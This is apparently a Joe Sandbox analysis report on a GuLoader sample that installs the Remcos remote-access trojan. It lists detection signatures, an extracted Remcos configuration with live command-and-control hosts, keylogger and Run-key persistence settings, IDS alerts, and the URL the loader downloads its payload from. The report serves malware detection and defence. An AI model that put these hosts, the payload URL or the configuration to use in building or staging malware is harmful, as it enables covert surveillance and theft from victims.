Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x6yDsHJ9tr.exe

Overview

General Information

Sample name:x6yDsHJ9tr.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:4e8d586a950492c30147b7d56bcfad49cd577966
Analysis ID:1590938
MD5:25eec63edf7c0eb8628a89712b5cb363
SHA1:4e8d586a950492c30147b7d56bcfad49cd577966
SHA256:e075807417590255de4d395fa3dfbc336e88c96bbab8afca1d5e5d5abbac0237
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Installs a global keyboard hook
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • x6yDsHJ9tr.exe (PID: 1672 cmdline: "C:\Users\user\Desktop\x6yDsHJ9tr.exe" MD5: 25EEC63EDF7C0EB8628A89712B5CB363)
    • x6yDsHJ9tr.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\x6yDsHJ9tr.exe" MD5: 25EEC63EDF7C0EB8628A89712B5CB363)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000000.00000002.3373583635.0000000006C89000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 1 entries

              System Summary

              barindex
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x6yDsHJ9tr.exe, ProcessId: 5064, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Unvanquished
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x6yDsHJ9tr.exe, ProcessId: 5064, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Unvanquished

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\x6yDsHJ9tr.exe, ProcessId: 5064, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T15:42:29.698777+010020365941Malware Command and Control Activity Detected192.168.2.54998043.226.229.2093981TCP
              2025-01-14T15:42:33.363017+010020365941Malware Command and Control Activity Detected192.168.2.54998243.226.229.2093981TCP
              2025-01-14T15:42:37.051458+010020365941Malware Command and Control Activity Detected192.168.2.54998443.226.229.2093981TCP
              2025-01-14T15:42:40.810433+010020365941Malware Command and Control Activity Detected192.168.2.54998643.226.229.2093981TCP
              2025-01-14T15:42:44.541062+010020365941Malware Command and Control Activity Detected192.168.2.54998843.226.229.2093981TCP
              2025-01-14T15:42:48.217968+010020365941Malware Command and Control Activity Detected192.168.2.54999043.226.229.2093981TCP
              2025-01-14T15:42:51.901137+010020365941Malware Command and Control Activity Detected192.168.2.54999243.226.229.2093981TCP
              2025-01-14T15:42:55.612992+010020365941Malware Command and Control Activity Detected192.168.2.54999443.226.229.2093981TCP
              2025-01-14T15:42:59.283210+010020365941Malware Command and Control Activity Detected192.168.2.54999643.226.229.2093981TCP
              2025-01-14T15:43:02.985662+010020365941Malware Command and Control Activity Detected192.168.2.54999843.226.229.2093981TCP
              2025-01-14T15:43:06.666825+010020365941Malware Command and Control Activity Detected192.168.2.55000043.226.229.2093981TCP
              2025-01-14T15:43:10.354616+010020365941Malware Command and Control Activity Detected192.168.2.55000243.226.229.2093981TCP
              2025-01-14T15:43:14.000222+010020365941Malware Command and Control Activity Detected192.168.2.55000443.226.229.2093981TCP
              2025-01-14T15:43:17.680003+010020365941Malware Command and Control Activity Detected192.168.2.55000643.226.229.2093981TCP
              2025-01-14T15:43:21.414273+010020365941Malware Command and Control Activity Detected192.168.2.55000843.226.229.2093981TCP
              2025-01-14T15:43:25.106962+010020365941Malware Command and Control Activity Detected192.168.2.55001043.226.229.2093981TCP
              2025-01-14T15:43:28.780669+010020365941Malware Command and Control Activity Detected192.168.2.55001243.226.229.2093981TCP
              2025-01-14T15:43:32.465387+010020365941Malware Command and Control Activity Detected192.168.2.55001443.226.229.2093981TCP
              2025-01-14T15:43:36.189030+010020365941Malware Command and Control Activity Detected192.168.2.55001643.226.229.2093981TCP
              2025-01-14T15:43:39.883020+010020365941Malware Command and Control Activity Detected192.168.2.55001843.226.229.2093981TCP
              2025-01-14T15:43:43.560205+010020365941Malware Command and Control Activity Detected192.168.2.55002043.226.229.2093981TCP
              2025-01-14T15:43:47.316159+010020365941Malware Command and Control Activity Detected192.168.2.55002243.226.229.2093981TCP
              2025-01-14T15:43:51.006361+010020365941Malware Command and Control Activity Detected192.168.2.55002443.226.229.2093981TCP
              2025-01-14T15:43:54.684683+010020365941Malware Command and Control Activity Detected192.168.2.55002643.226.229.2093981TCP
              2025-01-14T15:43:58.413124+010020365941Malware Command and Control Activity Detected192.168.2.55002843.226.229.2093981TCP
              2025-01-14T15:44:02.141533+010020365941Malware Command and Control Activity Detected192.168.2.55003043.226.229.2093981TCP
              2025-01-14T15:44:06.062993+010020365941Malware Command and Control Activity Detected192.168.2.55003243.226.229.2093981TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T15:42:27.059228+010020327761Malware Command and Control Activity Detected192.168.2.54997943.226.229.2093980TCP
              2025-01-14T15:42:30.732264+010020327761Malware Command and Control Activity Detected192.168.2.54998143.226.229.2093980TCP
              2025-01-14T15:42:34.391044+010020327761Malware Command and Control Activity Detected192.168.2.54998343.226.229.2093980TCP
              2025-01-14T15:42:38.109274+010020327761Malware Command and Control Activity Detected192.168.2.54998543.226.229.2093980TCP
              2025-01-14T15:42:41.841612+010020327761Malware Command and Control Activity Detected192.168.2.54998743.226.229.2093980TCP
              2025-01-14T15:42:45.576043+010020327761Malware Command and Control Activity Detected192.168.2.54998943.226.229.2093980TCP
              2025-01-14T15:42:49.233656+010020327761Malware Command and Control Activity Detected192.168.2.54999143.226.229.2093980TCP
              2025-01-14T15:42:52.935342+010020327761Malware Command and Control Activity Detected192.168.2.54999343.226.229.2093980TCP
              2025-01-14T15:42:56.623911+010020327761Malware Command and Control Activity Detected192.168.2.54999543.226.229.2093980TCP
              2025-01-14T15:43:00.310270+010020327761Malware Command and Control Activity Detected192.168.2.54999743.226.229.2093980TCP
              2025-01-14T15:43:03.997903+010020327761Malware Command and Control Activity Detected192.168.2.54999943.226.229.2093980TCP
              2025-01-14T15:43:07.701426+010020327761Malware Command and Control Activity Detected192.168.2.55000143.226.229.2093980TCP
              2025-01-14T15:43:11.372776+010020327761Malware Command and Control Activity Detected192.168.2.55000343.226.229.2093980TCP
              2025-01-14T15:43:15.029106+010020327761Malware Command and Control Activity Detected192.168.2.55000543.226.229.2093980TCP
              2025-01-14T15:43:18.782844+010020327761Malware Command and Control Activity Detected192.168.2.55000743.226.229.2093980TCP
              2025-01-14T15:43:22.435609+010020327761Malware Command and Control Activity Detected192.168.2.55000943.226.229.2093980TCP
              2025-01-14T15:43:26.122511+010020327761Malware Command and Control Activity Detected192.168.2.55001143.226.229.2093980TCP
              2025-01-14T15:43:29.810398+010020327761Malware Command and Control Activity Detected192.168.2.55001343.226.229.2093980TCP
              2025-01-14T15:43:33.482595+010020327761Malware Command and Control Activity Detected192.168.2.55001543.226.229.2093980TCP
              2025-01-14T15:43:37.218328+010020327761Malware Command and Control Activity Detected192.168.2.55001743.226.229.2093980TCP
              2025-01-14T15:43:40.904556+010020327761Malware Command and Control Activity Detected192.168.2.55001943.226.229.2093980TCP
              2025-01-14T15:43:44.593686+010020327761Malware Command and Control Activity Detected192.168.2.55002143.226.229.2093980TCP
              2025-01-14T15:43:48.327339+010020327761Malware Command and Control Activity Detected192.168.2.55002343.226.229.2093980TCP
              2025-01-14T15:43:52.028883+010020327761Malware Command and Control Activity Detected192.168.2.55002543.226.229.2093980TCP
              2025-01-14T15:43:55.700248+010020327761Malware Command and Control Activity Detected192.168.2.55002743.226.229.2093980TCP
              2025-01-14T15:43:59.450332+010020327761Malware Command and Control Activity Detected192.168.2.55002943.226.229.2093980TCP
              2025-01-14T15:44:03.378073+010020327761Malware Command and Control Activity Detected192.168.2.55003143.226.229.2093980TCP
              2025-01-14T15:44:10.294478+010020327761Malware Command and Control Activity Detected192.168.2.55003343.226.229.2093980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T15:42:21.159945+010028032702Potentially Bad Traffic192.168.2.549978109.99.162.14443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.batReversingLabs: Detection: 26%
              Source: x6yDsHJ9tr.exeVirustotal: Detection: 34%Perma Link
              Source: x6yDsHJ9tr.exeReversingLabs: Detection: 26%
              Source: Yara matchFile source: 00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: x6yDsHJ9tr.exe PID: 5064, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: x6yDsHJ9tr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:49978 version: TLS 1.2
              Source: x6yDsHJ9tr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mshtml.pdb source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: mshtml.pdbUGP source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49985 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49997 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49993 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50001 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49979 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49983 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49999 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50008 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49994 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50016 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49984 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50013 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49995 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50010 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49987 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50009 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49992 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50027 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50005 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50004 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50002 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50025 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50022 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49982 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50018 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49986 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50014 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49991 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50019 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49988 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50030 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50003 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50023 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50011 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49989 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50026 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50021 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50017 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50024 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49998 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50006 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50033 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50032 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49990 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50020 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50029 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50012 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50031 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49981 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50000 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50015 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49980 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50007 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49996 -> 43.226.229.209:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50028 -> 43.226.229.209:3981
              Source: Malware configuration extractorURLs: linktreewealth.zapto.org
              Source: Malware configuration extractorURLs: linktreewealth.zapto.org
              Source: Malware configuration extractorURLs: linktreewealthy.zapto.org
              Source: global trafficTCP traffic: 43.226.229.209 ports 3980,3981,0,3,8,9
              Source: global trafficTCP traffic: 192.168.2.5:49979 -> 43.226.229.209:3980
              Source: Joe Sandbox ViewIP Address: 109.99.162.14 109.99.162.14
              Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49978 -> 109.99.162.14:443
              Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: teldrum.ro
              Source: global trafficDNS traffic detected: DNS query: linktreewealth.zapto.org
              Source: global trafficDNS traffic detected: DNS query: linktreewealthy.zapto.org
              Source: x6yDsHJ9tr.exe, 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmp, x6yDsHJ9tr.exe, 00000000.00000000.2092615557.000000000040A000.00000008.00000001.01000000.00000003.sdmp, x6yDsHJ9tr.exe, 00000004.00000000.3369669549.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
              Source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
              Source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
              Source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/&
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin0
